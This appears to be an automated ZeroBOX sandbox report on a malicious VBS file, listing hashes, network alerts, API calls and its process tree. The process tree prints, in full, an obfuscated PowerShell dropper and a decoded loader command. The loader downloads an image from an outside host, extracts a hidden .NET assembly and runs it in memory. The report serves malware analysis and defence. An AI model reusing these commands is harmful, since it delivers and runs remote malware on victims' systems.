popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

xlammexpoittt.vbs

Generic Malware Antivirus PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Oct. 27, 2023, 5 p.m. Oct. 27, 2023, 5:04 p.m.
Size 107.4KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 9595077ef106c2510f73d0132ea81155
SHA256 ef6fe5bef68a9e8fbcdad06c5f97d5d4a72ec0355181be42fc67b9ad4b770592
CRC32 875F0B27
ssdeep 1536:F+kdDkYHMe4Mi3mI2hb7KZ18C2NGkikGkFjGkikGkKEt0eEKU+kCKGWGPrbrbTDb:8eBQZxNj53e
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\xlammexpoittt.vbs

    840

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('kxtWMgO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"

      2140

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

        2236

Name Response Post-Analysis Lookup
apps.identrust.com
A 121.254.136.9
CNAME a1952.dscq.akamai.net
CNAME identrust.edgesuite.net
23.67.53.17
paste.ee
A 104.21.84.67
A 172.67.187.200
104.21.84.67
uploaddeimagens.com.br
A 104.21.45.138
A 172.67.215.45
172.67.215.45
IP Address Status Action
185.196.8.176 Active Moloch
104.21.45.138 Active Moloch
104.21.84.67 Active Moloch
121.254.136.9 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49161 -> 104.21.84.67:443 2034978 ET POLICY Pastebin-style Service (paste .ee) in TLS SNI Potential Corporate Privacy Violation
TCP 192.168.56.103:49167 -> 104.21.45.138:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49161 -> 104.21.84.67:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49167
104.21.45.138:443 		C=US, O=Let's Encrypt, CN=E1 CN=uploaddeimagens.com.br d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71
TLSv1
192.168.56.103:49161
104.21.84.67:443 		C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=paste.ee cd:77:4c:26:1f:f8:63:15:43:5a:ba:aa:11:f1:e7:1a:23:3e:4b:15

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: annel."
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: At line:1 char:177
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: .jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $we
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: bClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding]::UTF8
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: .GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_EN
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: D>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexO
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: f($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $st
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: artFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageT
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: ext.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::Fro
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: mBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::L
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: oad($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $typ
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: e.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvc
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: mRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dad
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: sa' , 'de' , 'cu'))
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x0000011b
1 1 0

WriteConsoleW

 buffer: Parameter name: bytes"
console_handle: 0x00000127
1 1 0

WriteConsoleW

 buffer: At line:1 char:240
console_handle: 0x00000133
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe
console_handle: 0x0000013f
1 1 0

WriteConsoleW

 buffer: .jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $we
console_handle: 0x0000014b
1 1 0

WriteConsoleW

 buffer: bClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetSt
console_handle: 0x00000157
1 1 0

WriteConsoleW

 buffer: ring <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_EN
console_handle: 0x00000163
1 1 0

WriteConsoleW

 buffer: D>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexO
console_handle: 0x0000016f
1 1 0

WriteConsoleW

 buffer: f($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $st
console_handle: 0x0000017b
1 1 0

WriteConsoleW

 buffer: artFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageT
console_handle: 0x00000187
1 1 0

WriteConsoleW

 buffer: ext.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::Fro
console_handle: 0x00000193
1 1 0

WriteConsoleW

 buffer: mBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::L
console_handle: 0x0000019f
1 1 0

WriteConsoleW

 buffer: oad($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $typ
console_handle: 0x000001ab
1 1 0

WriteConsoleW

 buffer: e.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvc
console_handle: 0x000001b7
1 1 0

WriteConsoleW

 buffer: mRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dad
console_handle: 0x000001c3
1 1 0

WriteConsoleW

 buffer: sa' , 'de' , 'cu'))
console_handle: 0x000001cf
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001db
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001e7
1 1 0

WriteConsoleW

 buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000207
1 1 0

WriteConsoleW

 buffer: At line:1 char:346
console_handle: 0x00000213
1 1 0

WriteConsoleW

 buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe
console_handle: 0x0000021f
1 1 0

WriteConsoleW

 buffer: .jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $we
console_handle: 0x0000022b
1 1 0

WriteConsoleW

 buffer: bClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetSt
console_handle: 0x00000237
1 1 0

WriteConsoleW

 buffer: ring($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$
console_handle: 0x00000243
1 1 0

WriteConsoleW

 buffer: startIndex = $imageText.IndexOf <<<< ($startFlag);$endIndex = $imageText.IndexO
console_handle: 0x0000024f
1 1 0

WriteConsoleW

 buffer: f($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $st
console_handle: 0x0000025b
1 1 0

WriteConsoleW

 buffer: artFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageT
console_handle: 0x00000267
1 1 0

WriteConsoleW

 buffer: ext.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::Fro
console_handle: 0x00000273
1 1 0

WriteConsoleW

 buffer: mBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::L
console_handle: 0x0000027f
1 1 0

WriteConsoleW

 buffer: oad($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $typ
console_handle: 0x0000028b
1 1 0

WriteConsoleW

 buffer: e.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvc
console_handle: 0x00000297
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00315f08
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316608
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316608
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316608
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00315cc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00315cc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00315cc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00315cc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00315cc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00315cc8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316608
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316608
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316608
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316748
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

